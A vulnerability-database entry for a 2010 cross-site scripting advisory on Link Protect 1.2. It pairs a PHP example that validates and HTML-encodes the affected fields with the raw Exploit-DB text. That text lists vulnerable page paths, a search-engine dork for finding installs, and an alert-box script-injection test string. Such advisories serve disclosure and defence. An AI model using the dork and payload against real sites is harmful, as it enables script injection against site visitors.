Vendor: Link Protect
By: Shichemt Alen
CVSS: 7.5 (HIGH)
CWE: 79, Cross-Site Scripting (XSS)
Product Name: Link Protect
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: NO
Related CWE: None
CPE: None
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2 DE & Ubuntu 10.10
Year: 2010

Link Protect 1.2 XSS Vulnerabilities

Link Protect 1.2 is vulnerable to Cross-Site Scripting (XSS) attacks. An attacker can inject malicious JavaScript code into the 'description', 'name', 'email' or 'link' fields of the 'linkcheck.php', 'contact_us.php' and 'signup.php' pages. This malicious code will be executed in the browser of the victim when they visit the vulnerable page.

Mitigation:

Input validation should be used to prevent XSS attacks.
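
An added example (not Link Protect's code, which this page does not show) of handling the four named fields in PHP: each is validated on input and HTML-encoded on output, because a free-text field such as description can pass validation and still carry markup. The function names, character rules and length limits are assumptions.

```php
<?php
// Added example: hypothetical handlers, not Link Protect's code.

// Encode a value for HTML text or a quoted attribute. ENT_QUOTES also
// encodes " and ', which the reported payload uses to leave an attribute.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Validate the four fields named in the advisory; returns [clean, errors].
// Character rules and length limits are assumptions.
function validate_fields(array $in): array
{
    $clean = $errors = [];
    foreach (['name', 'email', 'link', 'description'] as $f) {
        $clean[$f] = isset($in[$f]) && is_string($in[$f]) ? trim($in[$f]) : '';
    }
    if (!preg_match('/^[\p{L}\p{N} .\'-]{1,64}\z/u', $clean['name'])) {
        $errors['name'] = 'unsupported characters or length';
    }
    if (filter_var($clean['email'], FILTER_VALIDATE_EMAIL) === false) {
        $errors['email'] = 'not a valid e-mail address';
    }
    // Require a well-formed URL and allow only http/https as the scheme.
    $scheme = strtolower((string) parse_url($clean['link'], PHP_URL_SCHEME));
    if (filter_var($clean['link'], FILTER_VALIDATE_URL) === false
        || !in_array($scheme, ['http', 'https'], true)) {
        $errors['link'] = 'not an http(s) URL';
    }
    // Free text: only the length is checked, so encoding on output is what
    // keeps markup in this field inert.
    $len = strlen($clean['description']);
    if ($len < 1 || $len > 2000) {
        $errors['description'] = 'length out of range';
    }
    return [$clean, $errors];
}

// Constructed input: the advisory's test string in two of the fields.
$payload = '"><script>alert("EPIC FAIL\nTunisia")</script>';
$sample = ['name' => $payload, 'email' => 'user@example.com',
           'link' => 'http://example.com/page', 'description' => $payload];
[$clean, $errors] = validate_fields($sample);
foreach ($clean as $field => $value) {
    $status = isset($errors[$field]) ? 'rejected: ' . $errors[$field] : 'accepted';
    echo $field, ' (', $status, '): <input value="', e($value), '">', PHP_EOL;
}
```

The description field is accepted with the test string in it, yet the output contains only `&quot;&gt;&lt;script&gt;...`, so the browser renders it as text.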
Source

Exploit-DB raw data:

# Exploit Title: Link Protect 1.2 XSS Vulnerabilities
# Date: 11-29-2010
# Author: Shichemt Alen
# Software Link: None
# Version: 1.2
# Platform / Tested on: Windows XP SP2 DE & Ubuntu 10.10
# category: webapps/0day
# Dork : inurl:"sorry script'kiddies"
# Contact : shichemt@hotmail.com - http://www.shichemt-alen.com/


#Exploit : http://localhost/fail/linkcheck.php?linkid=++++++

---------- http://localhost/fail/contact_us.php

---------- http://localhost/fail/signup.php

Put "><script>alert("EPIC FAIL\nTunisia")</script> in description, name, email or link


############ Made in Tunisia +216 ############

Greets to :  Geeks Team {Pr0t3ct0r,Hamed, K-D0vic, Mid0vik, UbunBoy}

-----------------------

xTobi, Net-Own3r, Wx, BosnianTREX, Number7, Ghost-tn and All Friends...

& All Tunisian and Muslim Hackers...


############ Made in Tunisia +216 ############